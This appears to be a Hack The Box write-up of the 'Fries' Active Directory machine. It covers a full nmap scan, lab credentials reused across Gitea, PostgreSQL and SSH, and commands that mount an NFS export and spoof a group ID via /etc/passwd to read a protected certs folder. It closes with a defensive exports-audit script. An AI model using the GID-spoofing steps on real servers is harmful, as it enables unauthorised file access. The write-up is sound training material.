Fries is a hard Active Directory machine on Hack The Box. It involves various techniques such as LDAP enumeration, Kerberos attacks, and SMB exploitation to gain access to the system and escalate privileges to root.
# Nmap 7.95 scan initiated Sat Nov 22 23:58:57 2025 as: /usr/lib/nmap/nmap --privileged -sVC -oN /home/kasemsh/CTF_Machines/fries/nmap/nmap fries.htb
Nmap scan report for fries.htb (10.10.11.96)
Host is up (0.11s latency).
rDNS record for 10.10.11.96: DC01.fries.htb
Scanned at 2025-11-22 23:58:58 IST for 98s
Not shown: 984 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b3:a8:f7:5d:60:e8:66:16:ca:92:f6:76:ba:b8:33:c2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLS2jzf8Eqy8cVa20hyZcem8rwAzeRhrMNEGdSUcFmv1FiQsfR4F9vZYkmfKViGIS3uL3X/6sJjzGxT1F/uPm/U=
| 256 07:ef:11:a6:a0:7d:2b:4d:e8:68:79:1a:7b:a7:a9:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFj9hE1zqO6TQ2JpjdgvMm6cr6s6eYsQKWlROV4G6q+4
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Welcome to Fries - Fries Restaurant
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-23 04:59:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-11-23T05:00:38+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.fries.htb, DNS:fries.htb, DNS:FRIES
| Issuer: commonName=fries-DC01-CA/domainComponent=fries
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-18T05:39:19
| Not valid after: 2105-11-18T05:39:19
| MD5: 2410:a18d:14b3:7f5d:8e34:d144:0bac:6469
| SHA-1: 3e84:1436:bb47:6ccd:f5ee:f805:cacd:47b6:6485:7e09
| -----BEGIN CERTIFICATE-----
| MIIF4zCCBMugAwIBAgITYQAAACgkBIm4DHPMcwABAAAAKDANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRUwEwYKCZImiZPyLGQBGRYFZnJpZXMx
| FjAUBgNVBAMTDWZyaWVzLURDMDEtQ0EwIBcNMjUxMTE4MDUzOTE5WhgPMjEwNTEx
| MTgwNTM5MTlaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPpxCC
| aZWpQqWfYbE5TXkYhqP9hxJvhmYaiPe+peUBqDXSVkdoBGOt600NkzwyjrFZIJLE
| uceFPfxXD1fl1FENc+oEBbyt3EHEovDoJk+cY/45E6fe9C621W+z7bNvKbPxyuXa
| xkxjkxClaIrYHMgk96M6zdvr9AOOiX8UhPqoSeogF8JRuYHmOBImuY2yqr1eRrvH
| LfTfiHPUJR5W6TJ+Fhfz7N7tgo74ddW9WVT3sgvwbbHVUZOpr3XxBQdJRHyzv05Y
| F+KIK3gtn1UMh7pX1NTTIKO3cOiivZCcw+uodamORjrFKloFKpFHJairIDP5MQvG
| +ngp4j7SANPL4KntAgMBAAGjggMOMIIDCjA2BgkrBgEEAYI3FQcEKTAnBh8rBgEE
| AYI3FQiFyocNqsACgomNG8Off4K99k2BAQEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFHdnDz/EL+Qpk3Bq1tnE
| qNe1qcmvMB8GA1UdIwQYMBaAFByH741F57ZStYVlo/TEvDOCG1KcMIHJBgNVHR8E
| gcEwgb4wgbuggbiggbWGgbJsZGFwOi8vL0NOPWZyaWVzLURDMDEtQ0EoMSksQ049
| REMwMSxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vydmlj
| ZXMsQ049Q29uZmlndXJhdGlvbixEQz1mcmllcyxEQz1odGI/Y2VydGlmaWNhdGVS
| ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
| aW50MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NO
| PWZyaWVzLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9ZnJpZXMsREM9aHRiP2NB
| Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
| aXR5MC4GA1UdEQEB/wQkMCKCDkRDMDEuZnJpZXMuaHRigglmcmllcy5odGKCBUZS
| SUVTME4GCSsGAQQBgjcZAgRBMD+gPQYKKwYBBAGCNxkCAaAvBC1TLTEtNS0yMS04
| NTgzMzgzNDYtMzg2MTAzMDUxNi0zOTc1MjQwNDcyLTEwMDAwDQYJKoZIhvcNAQEL
| BQADggEBAHaVyk9K3fNRHrh+9cAwXe+jqDqd5iZPSuw6EVABWAdLg9L9r+9bejsO
| Uin7De6fHFHn9EFNM6SJ4fM+g6gnEXwoIuPqmulcE+4zj7U52blMchO/TAFb23HS
| 1bJqvBpy0il8TJfHg6cQs7/F4H5qOOHqTaeciKWnuUR4V3z69mhSMQezkVn7NrbG
| tkH7x05OzZ4slQO3ac3IRkKeRNiD/3gaqmiPEOtHWq11ulKg5ezwvh3fOT9mMCXH
| halJstv6Jh+Xse4ZFHey/dY4/oEqLcwHmnRzmEku2kJ5ND+N0N+oO0jfni6Lg7f5
| LlBoD6A7Z0XQ77rtTrk5tPjER7aq66k=
|_-----END CERTIFICATE-----
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: Site does not have a title (text/html;charset=ISO-8859-1).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: F588322AAF157D82BB030AF1EFFD8CF9
| ssl-cert: Subject: commonName=pwm.fries.htb/organizationName=Fries Foods LTD/stateOrProvinceName=Madrid/countryName=SP/emailAddress=web@fries.htb/organizationalUnitName=PWM Configuration/localityName=Madrid
| Issuer: commonName=pwm.fries.htb/organizationName=Fries Foods LTD/stateOrProvinceName=Madrid/countryName=SP/emailAddress=web@fries.htb/organizationalUnitName=PWM Configuration/localityName=Madrid
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-01T22:06:09
| Not valid after: 2026-06-01T22:06:09
| MD5: 118d:ea17:3fba:3b65:28de:8e26:33e7:19f2
| SHA-1: 5503:8aa8:0080:a853:ca73:87e3:b705:3fe8:b599:a855
| -----BEGIN CERTIFICATE-----
| MIIEGTCCAwGgAwIBAgIUW1MfdMXjo8YcnnMWmFQNMkXzkeAwDQYJKoZIhvcNAQEL
| BQAwgZsxCzAJBgNVBAYTAlNQMQ8wDQYDVQQIDAZNYWRyaWQxDzANBgNVBAcMBk1h
| ZHJpZDEYMBYGA1UECgwPRnJpZXMgRm9vZHMgTFREMRowGAYDVQQLDBFQV00gQ29u
| ZmlndXJhdGlvbjEWMBQGA1UEAwwNcHdtLmZyaWVzLmh0YjEcMBoGCSqGSIb3DQEJ
| ARYNd2ViQGZyaWVzLmh0YjAeFw0yNTA2MDEyMjA2MDlaFw0yNjA2MDEyMjA2MDla
| MIGbMQswCQYDVQQGEwJTUDEPMA0GA1UECAwGTWFkcmlkMQ8wDQYDVQQHDAZNYWRy
| aWQxGDAWBgNVBAoMD0ZyaWVzIEZvb2RzIExURDEaMBgGA1UECwwRUFdNIENvbmZp
| Z3VyYXRpb24xFjAUBgNVBAMMDXB3bS5mcmllcy5odGIxHDAaBgkqhkiG9w0BCQEW
| DXdlYkBmcmllcy5odGIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC6
| 5V7dwNSFeKCUGSPuALuZyalQxLProDbZiTVQPJcNj6EmHLG1vxsqXpSrJhCb7dBh
| FiuU36jvy5hbxTgYJ/kXaPO83wAjaTkWe4Dv1cPXTtqyUTx4X9k3W+cU9Rf/Sr4M
| seK3Ub9+2TYaLxRNHwE+eQ+dJQ7/RQOeYZWGc9xEA4nlqwLpT52PCfftdMdZzxzG
| XBhf0TYloX5hLPpFvl/YyZ2foBdbHbODoyXmnvXlboCMlxnpNywyw0pV7DAa4cNk
| 2KZZXzHLvCZ+Ev1+yIt+19J6mFSdHMJjjKSB/fkMuXv2ZN3bTpbVkHz/ruaEG9u7
| MTulepgoLY3XzEKMcq1zAgMBAAGjUzBRMB0GA1UdDgQWBBRaBJosucIruiAxu5z0
| HgysCx0EpDAfBgNVHSMEGDAWgBRaBJosucIruiAxu5z0HgysCx0EpDAPBgNVHRMB
| Af8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAOewUzyifCBtN0FEuDGBX1Z3KY
| ih1AI0wHKhgbDl1HynxsrJ/W2dNtfNzRxDI7sHVN9YSulP+X06ByWwKpehlFbkiM
| DsYhnFsKtlYK/i10hqOynZ18CFvKkvStqfXXgaAQHyL0u12UiOBDM6Jwm/nNKqXx
| Qog6y2Hgi9WCclcYdwyKdiKdeiMz1b4yIIwDiZw01vGo/uyX+nDIsH/6OGbwI0yE
| +ajXRFITQz7FjkcXpqxncpSdDETi5uGse89ebqfnP2TSHRSQSmxmkNO4ZP0Mn9u7
| yQtdyRxIZrJPyWOeB7g3W/xo7BhUKs/tC8lAY3nA4PoDVMh49pyf/JNU8b8F
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.fries.htb, DNS:fries.htb, DNS:FRIES
| Issuer: commonName=fries-DC01-CA/domainComponent=fries
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-18T05:39:19
| Not valid after: 2105-11-18T05:39:19
| MD5: 2410:a18d:14b3:7f5d:8e34:d144:0bac:6469
| SHA-1: 3e84:1436:bb47:6ccd:f5ee:f805:cacd:47b6:6485:7e09
| -----BEGIN CERTIFICATE-----
| MIIF4zCCBMugAwIBAgITYQAAACgkBIm4DHPMcwABAAAAKDANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRUwEwYKCZImiZPyLGQBGRYFZnJpZXMx
| FjAUBgNVBAMTDWZyaWVzLURDMDEtQ0EwIBcNMjUxMTE4MDUzOTE5WhgPMjEwNTEx
| MTgwNTM5MTlaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPpxCC
| aZWpQqWfYbE5TXkYhqP9hxJvhmYaiPe+peUBqDXSVkdoBGOt600NkzwyjrFZIJLE
| uceFPfxXD1fl1FENc+oEBbyt3EHEovDoJk+cY/45E6fe9C621W+z7bNvKbPxyuXa
| xkxjkxClaIrYHMgk96M6zdvr9AOOiX8UhPqoSeogF8JRuYHmOBImuY2yqr1eRrvH
| LfTfiHPUJR5W6TJ+Fhfz7N7tgo74ddW9WVT3sgvwbbHVUZOpr3XxBQdJRHyzv05Y
| F+KIK3gtn1UMh7pX1NTTIKO3cOiivZCcw+uodamORjrFKloFKpFHJairIDP5MQvG
| +ngp4j7SANPL4KntAgMBAAGjggMOMIIDCjA2BgkrBgEEAYI3FQcEKTAnBh8rBgEE
| AYI3FQiFyocNqsACgomNG8Off4K99k2BAQEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFHdnDz/EL+Qpk3Bq1tnE
| qNe1qcmvMB8GA1UdIwQYMBaAFByH741F57ZStYVlo/TEvDOCG1KcMIHJBgNVHR8E
| gcEwgb4wgbuggbiggbWGgbJsZGFwOi8vL0NOPWZyaWVzLURDMDEtQ0EoMSksQ049
| REMwMSxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vydmlj
| ZXMsQ049Q29uZmlndXJhdGlvbixEQz1mcmllcyxEQz1odGI/Y2VydGlmaWNhdGVS
| ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
| aW50MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NO
| PWZyaWVzLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9ZnJpZXMsREM9aHRiP2NB
| Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
| aXR5MC4GA1UdEQEB/wQkMCKCDkRDMDEuZnJpZXMuaHRigglmcmllcy5odGKCBUZS
| SUVTME4GCSsGAQQBgjcZAgRBMD+gPQYKKwYBBAGCNxkCAaAvBC1TLTEtNS0yMS04
| NTgzMzgzNDYtMzg2MTAzMDUxNi0zOTc1MjQwNDcyLTEwMDAwDQYJKoZIhvcNAQEL
| BQADggEBAHaVyk9K3fNRHrh+9cAwXe+jqDqd5iZPSuw6EVABWAdLg9L9r+9bejsO
| Uin7De6fHFHn9EFNM6SJ4fM+g6gnEXwoIuPqmulcE+4zj7U52blMchO/TAFb23HS
| 1bJqvBpy0il8TJfHg6cQs7/F4H5qOOHqTaeciKWnuUR4V3z69mhSMQezkVn7NrbG
| tkH7x05OzZ4slQO3ac3IRkKeRNiD/3gaqmiPEOtHWq11ulKg5ezwvh3fOT9mMCXH
| halJstv6Jh+Xse4ZFHey/dY4/oEqLcwHmnRzmEku2kJ5ND+N0N+oO0jfni6Lg7f5
| LlBoD6A7Z0XQ77rtTrk5tPjER7aq66k=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-11-23T05:00:37+00:00; +7h00m01s from scanner time.
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.fries.htb, DNS:fries.htb, DNS:FRIES
| Issuer: commonName=fries-DC01-CA/domainComponent=fries
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-18T05:39:19
| Not valid after: 2105-11-18T05:39:19
| MD5: 2410:a18d:14b3:7f5d:8e34:d144:0bac:6469
| SHA-1: 3e84:1436:bb47:6ccd:f5ee:f805:cacd:47b6:6485:7e09
| -----BEGIN CERTIFICATE-----
| MIIF4zCCBMugAwIBAgITYQAAACgkBIm4DHPMcwABAAAAKDANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRUwEwYKCZImiZPyLGQBGRYFZnJpZXMx
| FjAUBgNVBAMTDWZyaWVzLURDMDEtQ0EwIBcNMjUxMTE4MDUzOTE5WhgPMjEwNTEx
| MTgwNTM5MTlaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPpxCC
| aZWpQqWfYbE5TXkYhqP9hxJvhmYaiPe+peUBqDXSVkdoBGOt600NkzwyjrFZIJLE
| uceFPfxXD1fl1FENc+oEBbyt3EHEovDoJk+cY/45E6fe9C621W+z7bNvKbPxyuXa
| xkxjkxClaIrYHMgk96M6zdvr9AOOiX8UhPqoSeogF8JRuYHmOBImuY2yqr1eRrvH
| LfTfiHPUJR5W6TJ+Fhfz7N7tgo74ddW9WVT3sgvwbbHVUZOpr3XxBQdJRHyzv05Y
| F+KIK3gtn1UMh7pX1NTTIKO3cOiivZCcw+uodamORjrFKloFKpFHJairIDP5MQvG
| +ngp4j7SANPL4KntAgMBAAGjggMOMIIDCjA2BgkrBgEEAYI3FQcEKTAnBh8rBgEE
| AYI3FQiFyocNqsACgomNG8Off4K99k2BAQEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFHdnDz/EL+Qpk3Bq1tnE
| qNe1qcmvMB8GA1UdIwQYMBaAFByH741F57ZStYVlo/TEvDOCG1KcMIHJBgNVHR8E
| gcEwgb4wgbuggbiggbWGgbJsZGFwOi8vL0NOPWZyaWVzLURDMDEtQ0EoMSksQ049
| REMwMSxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vydmlj
| ZXMsQ049Q29uZmlndXJhdGlvbixEQz1mcmllcyxEQz1odGI/Y2VydGlmaWNhdGVS
| ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
| aW50MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NO
| PWZyaWVzLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9ZnJpZXMsREM9aHRiP2NB
| Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
| aXR5MC4GA1UdEQEB/wQkMCKCDkRDMDEuZnJpZXMuaHRigglmcmllcy5odGKCBUZS
| SUVTME4GCSsGAQQBgjcZAgRBMD+gPQYKKwYBBAGCNxkCAaAvBC1TLTEtNS0yMS04
| NTgzMzgzNDYtMzg2MTAzMDUxNi0zOTc1MjQwNDcyLTEwMDAwDQYJKoZIhvcNAQEL
| BQADggEBAHaVyk9K3fNRHrh+9cAwXe+jqDqd5iZPSuw6EVABWAdLg9L9r+9bejsO
| Uin7De6fHFHn9EFNM6SJ4fM+g6gnEXwoIuPqmulcE+4zj7U52blMchO/TAFb23HS
| 1bJqvBpy0il8TJfHg6cQs7/F4H5qOOHqTaeciKWnuUR4V3z69mhSMQezkVn7NrbG
| tkH7x05OzZ4slQO3ac3IRkKeRNiD/3gaqmiPEOtHWq11ulKg5ezwvh3fOT9mMCXH
| halJstv6Jh+Xse4ZFHey/dY4/oEqLcwHmnRzmEku2kJ5ND+N0N+oO0jfni6Lg7f5
| LlBoD6A7Z0XQ77rtTrk5tPjER7aq66k=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-11-23T05:00:38+00:00; +7h00m02s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-11-23T05:00:37+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.fries.htb, DNS:fries.htb, DNS:FRIES
| Issuer: commonName=fries-DC01-CA/domainComponent=fries
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-18T05:39:19
| Not valid after: 2105-11-18T05:39:19
| MD5: 2410:a18d:14b3:7f5d:8e34:d144:0bac:6469
| SHA-1: 3e84:1436:bb47:6ccd:f5ee:f805:cacd:47b6:6485:7e09
| -----BEGIN CERTIFICATE-----
| MIIF4zCCBMugAwIBAgITYQAAACgkBIm4DHPMcwABAAAAKDANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRUwEwYKCZImiZPyLGQBGRYFZnJpZXMx
| FjAUBgNVBAMTDWZyaWVzLURDMDEtQ0EwIBcNMjUxMTE4MDUzOTE5WhgPMjEwNTEx
| MTgwNTM5MTlaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPpxCC
| aZWpQqWfYbE5TXkYhqP9hxJvhmYaiPe+peUBqDXSVkdoBGOt600NkzwyjrFZIJLE
| uceFPfxXD1fl1FENc+oEBbyt3EHEovDoJk+cY/45E6fe9C621W+z7bNvKbPxyuXa
| xkxjkxClaIrYHMgk96M6zdvr9AOOiX8UhPqoSeogF8JRuYHmOBImuY2yqr1eRrvH
| LfTfiHPUJR5W6TJ+Fhfz7N7tgo74ddW9WVT3sgvwbbHVUZOpr3XxBQdJRHyzv05Y
| F+KIK3gtn1UMh7pX1NTTIKO3cOiivZCcw+uodamORjrFKloFKpFHJairIDP5MQvG
| +ngp4j7SANPL4KntAgMBAAGjggMOMIIDCjA2BgkrBgEEAYI3FQcEKTAnBh8rBgEE
| AYI3FQiFyocNqsACgomNG8Off4K99k2BAQEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFHdnDz/EL+Qpk3Bq1tnE
| qNe1qcmvMB8GA1UdIwQYMBaAFByH741F57ZStYVlo/TEvDOCG1KcMIHJBgNVHR8E
| gcEwgb4wgbuggbiggbWGgbJsZGFwOi8vL0NOPWZyaWVzLURDMDEtQ0EoMSksQ049
| REMwMSxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vydmlj
| ZXMsQ049Q29uZmlndXJhdGlvbixEQz1mcmllcyxEQz1odGI/Y2VydGlmaWNhdGVS
| ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
| aW50MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NO
| PWZyaWVzLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9ZnJpZXMsREM9aHRiP2NB
| Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
| aXR5MC4GA1UdEQEB/wQkMCKCDkRDMDEuZnJpZXMuaHRigglmcmllcy5odGKCBUZS
| SUVTME4GCSsGAQQBgjcZAgRBMD+gPQYKKwYBBAGCNxkCAaAvBC1TLTEtNS0yMS04
| NTgzMzgzNDYtMzg2MTAzMDUxNi0zOTc1MjQwNDcyLTEwMDAwDQYJKoZIhvcNAQEL
| BQADggEBAHaVyk9K3fNRHrh+9cAwXe+jqDqd5iZPSuw6EVABWAdLg9L9r+9bejsO
| Uin7De6fHFHn9EFNM6SJ4fM+g6gnEXwoIuPqmulcE+4zj7U52blMchO/TAFb23HS
| 1bJqvBpy0il8TJfHg6cQs7/F4H5qOOHqTaeciKWnuUR4V3z69mhSMQezkVn7NrbG
| tkH7x05OzZ4slQO3ac3IRkKeRNiD/3gaqmiPEOtHWq11ulKg5ezwvh3fOT9mMCXH
| halJstv6Jh+Xse4ZFHey/dY4/oEqLcwHmnRzmEku2kJ5ND+N0N+oO0jfni6Lg7f5
| LlBoD6A7Z0XQ77rtTrk5tPjER7aq66k=
|_-----END CERTIFICATE-----
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46245/tcp): CLEAN (Timeout)
| Check 2 (port 47430/tcp): CLEAN (Timeout)
| Check 3 (port 23943/udp): CLEAN (Timeout)
| Check 4 (port 21385/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-time:
| date: 2025-11-23T04:59:56
|_ start_date: N/A
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 23 00:00:36 2025 -- 1 IP address (1 host up) scanned in 98.86 seconds
echo -e '\n10.10.11.96 DC01.fries.htb fries.htb DC01 pwm.fries.htb code.fries.htb db-mgmt05.fries.htb' | sudo tee -a /etc/hosts
Log in to Gitea with the credentials already obtained: Username: d.cooper@fries.htb, Password: D4LE11maan!!

This reveals a new subdomain, db-mgmt05.fries.htb.

Potential usernames: svc, dale

PostgreSQL credentials: Username: root, Password: PsqLR00tpaSS11

Navigating to the db-mgmt05.fries.htb login page and signing in with these credentials, we see the application's version and that it runs on Python.

At the time of writing, only the Metasploit Framework has a working exploit available.

Looking at the environment variables, we find a password: Friesf00Ds2025!!

SSH into svc@web with the password Friesf00Ds2025!!

NFS is running.

We pivot through the box and mount the export on the attacker machine:
sudo mount -t nfs 192.168.100.2:/srv/web.fries.htb mount

We can't access the certs folder: it is owned by GID 59605603.

NFS with the default AUTH_SYS security flavour trusts whatever UID/GID the client sends, so we create a local user, set its primary GID to 59605603 in /etc/passwd, and read the folder as that user:
# 1 add a user
sudo adduser rand
# 2 set the GID of user rand to 59605603 (fourth field)
sudo vi /etc/passwd
rand:x:1002:59605603:,,,:/home/rand:/bin/bash
# switch to the rand user
su rand
# 3 copy everything from the certs folder to /dev/shm
cd mount/certs
cp * /dev/shm/
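Seen from the server side, the GID trick works because the export relies on AUTH_SYS: the NFS server accepts the UID and GID presented by the client kernel, so file ownership on the share protects nothing against a client root. The check an operator would want is an audit of /etc/exports for that trust. The following is an added example, not part of the original writeup: it parses an exports table and flags entries with the default sec=sys flavour, wildcard client lists and no_root_squash. SAMPLE_EXPORTS is a constructed table that only borrows the export path from the mount command above; the option names are the standard exports(5) ones.

```python
import re
from dataclasses import dataclass, field

# Constructed sample export table (not the machine's real one); the first path
# only borrows the export name seen in the mount command above.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/srv/web.fries.htb  192.168.100.0/24(rw,sync,no_subtree_check)
/srv/backups        *(rw,no_root_squash)
/srv/public         10.0.0.0/8(ro,sec=krb5p,all_squash)
"""


@dataclass
class Export:
    path: str
    client: str
    options: list[str]
    findings: list[str] = field(default_factory=list)


# Either client(opt,opt,...) or a bare client that gets the default options.
_ENTRY_RE = re.compile(r'(\S+?)\(([^)]*)\)|(\S+)')


def parse_exports(text: str) -> list[Export]:
    """Parse exports(5) text into one Export per (path, client) pair."""
    exports: list[Export] = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        parts = re.split(r'\s+', line, maxsplit=1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else '')
        matches = list(_ENTRY_RE.finditer(rest))
        if not matches:
            # A path with no client list is exported to everyone with defaults.
            exports.append(Export(path, '*', []))
        for m in matches:
            if m.group(1) is not None:
                opts = [o.strip() for o in m.group(2).split(',') if o.strip()]
                exports.append(Export(path, m.group(1), opts))
            else:
                exports.append(Export(path, m.group(3), []))
    return exports


def audit_export(e: Export) -> list[str]:
    """Return the identity-trust problems of one export entry."""
    findings = []
    # sec= may list several flavours separated by ':'; absence means sec=sys.
    sec = next((o[len('sec='):] for o in e.options if o.startswith('sec=')), 'sys')
    if 'sys' in sec.split(':'):
        findings.append('AUTH_SYS: the server trusts the UID/GID the client sends, '
                        'so root on any allowed client can take over any GID')
    if e.client.startswith('*'):
        findings.append('wildcard client: export is reachable from any matching host')
    if 'no_root_squash' in e.options:
        findings.append('no_root_squash: remote root keeps uid 0 on the export')
    return findings


def audit_exports(text: str) -> list[Export]:
    exports = parse_exports(text)
    for e in exports:
        e.findings = audit_export(e)
    return exports


def weak_exports(text: str) -> dict[str, list[str]]:
    """Map 'path -> client' to its findings, for the exports that have any."""
    return {f'{e.path} -> {e.client}': e.findings
            for e in audit_exports(text) if e.findings}


if __name__ == '__main__':
    for target, problems in weak_exports(SAMPLE_EXPORTS).items():
        print(target)
        for p in problems:
            print('  -', p)
```

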